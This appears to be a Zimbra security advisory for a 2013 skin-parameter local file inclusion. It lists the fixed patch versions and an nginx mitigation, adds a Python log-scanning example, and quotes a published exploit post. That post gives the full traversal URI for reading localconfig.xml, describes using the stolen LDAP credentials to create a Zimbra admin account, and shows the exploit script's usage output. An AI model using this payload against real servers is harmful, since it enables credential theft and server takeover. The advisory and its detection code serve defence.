Overview:
A reported "0day exploit" was posted on Twitter on Friday, December 06, 2013. However, please note: Zimbra has previously released a fix for this security bug.

Release Info:
This vulnerability was identified in Feb 2013, and a fix released by Zimbra in Feb 2013. The bug number was the following (note: it is locked, so the full details are not currently public):

Vulnerability about skin/branding feature, sensitive information can be retrieved
Access Denied
Fixed: 7.2.2 Patch 2, 7.2.3, 8.0.2 Patch 1, 8.0.3

A notification for this issue was published to the Zimbra Support Portal on Feb 26, 2013: https://support.zimbra.com/node/346
Also, a notification was included in these Release Notes:


8.0.2 Patch 1: http://files2.zimbra.com/website/doc...h_8_0_2_r1.pdf - February 19, 2013: Patch 8.0.2 P1 patch fixes the following bug: Bug 80338 Security Fix
7.2.2 Patch 2: http://files2.zimbra.com/website/doc...h_7_2_2_r1.pdf - February 19, 2013: Patch 7.2.2 P2 patch fixes the following bug: Bug 80338 Security Fix

ZCS7 Customers:
ZCS7 Customers should upgrade to 7.2.2 Patch 2 or later (7.2.5 is the latest, and 7.2.6 will be released in the near future). Customers running these versions should not be vulnerable.

ZCS8 Customers:
ZCS8 Customers should upgrade to 8.0.2 Patch 1 or later (8.0.5 is the latest, and 8.0.6 will be released in the near future). Customers running these versions should not be vulnerable.

Workaround:
If you are using nginx or another proxy, you can use a configuration like the following as a partial mitigation:

Add the following rules to
"nginx.conf.web.[http|https].default.template":

if ($request_uri ~ "\.\.") {
return 404;
}
if ($request_uri ~ "\%2[eE]\%2[eE]") {
return 404;
}

Then run:

$ zmproxyconfgen
$ zmproxyctl restart
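As an added example (not part of the original advisory or of the exploit post), the Python below mirrors the two nginx rules so you can check which raw request URIs they would reject, and scans constructed access-log lines for the skin-parameter traversal indicators described in the published exploit. The combined log format, the sample lines and the client addresses are assumptions.

```python
import re
from urllib.parse import unquote

# The two rules from the nginx workaround above; $request_uri is matched raw,
# so a literal ".." and its percent-encoded "%2e%2e" need separate patterns.
DOTDOT_RAW = re.compile(r"\.\.")
DOTDOT_ENC = re.compile(r"%2[eE]%2[eE]")

def blocked_by_workaround(request_uri):
    """True if either nginx rule would answer this raw request URI with 404."""
    return bool(DOTDOT_RAW.search(request_uri) or DOTDOT_ENC.search(request_uri))

# Combined-format access log (assumed): client, ident, user, [time], "request line", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')

def lfi_indicators(request_uri):
    """Indicators (taken from the published exploit) of a skin-parameter traversal attempt."""
    found = []
    decoded = unquote(request_uri)  # normalise %2e%2e / %2f to what the application sees
    if "/res/" in decoded and "skin=" in decoded and ".." in decoded:
        found.append("skin traversal")
    if "localconfig.xml" in decoded:
        found.append("localconfig.xml")
    if "%00" in request_uri:  # null-byte truncation used in the published URI
        found.append("null byte")
    return found

def scan_access_log(lines):
    """Return (client, status, indicators) for each request that looks like the LFI."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ind = lfi_indicators(m["uri"])
            if ind:
                hits.append((m["ip"], m["status"], ind))
    return hits

# Constructed sample log lines; clients, timestamps and sizes are made up.
RES = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450"
T = "[06/Dec/2013:10:00:01 +0000]"
SAMPLE_LOG = [
    f'203.0.113.5 - - {T} "GET {RES}&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 4821',
    f'203.0.113.5 - - {T} "GET {RES}&skin=%2e%2e%2f%2e%2e%2fopt%2fzimbra%2fconf%2flocalconfig.xml%00 HTTP/1.1" 404 0',
    f'198.51.100.7 - - {T} "GET {RES}&skin=harmony HTTP/1.1" 200 91234',
    f'198.51.100.9 - - {T} "GET /zimbra/ HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, status, ind in scan_access_log(SAMPLE_LOG):
        print(ip, status, ", ".join(ind))
```

The second sample line shows why the workaround needs both rules: the percent-encoded form never contains a literal "..", so only the second pattern would stop it at the proxy.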

Published Exploit:

Originally posted to Twitter: https://twitter.com/DigitalCTF

Zimbra - 0day exploit / Privilege escalation via LFI

# Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: Zimbra offers Open Source email server software and shared calendar for Linux and the Mac.
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected.
# Tested on: CentOS(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical

# Mirror: http://www.exploit-db.com/sploits/zi..._rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml, which contains LDAP root credentials.
These allow us to make requests to the /service/admin/soap API with the stolen
LDAP credentials to create a user with administration privileges and gain
access to the Administration Console.

The LFI is located at:
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Example :

https://mail.example.com/res/I18nMsg...Keys,ZmKeys,Zd...

or

https://mail.example.com:7071/zimbra...Msg,ZMsg,ZmMsg,...

----------------Exploit-----------------
Before using this exploit, the target server must have the admin console port
"7071" open, otherwise it won't work.

Use the exploit like this:
ruby run.rb -t mail.example.com -u someuser -p Test123_23
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : https://mail.example.com:7071/zimbraAdmin/
[*] Account : someuser@example.com
[*] Password : Test123_23
[+] Successfully Exploited !

The number of vulnerable servers is huge, like 80/100.
This is only for educational purposes.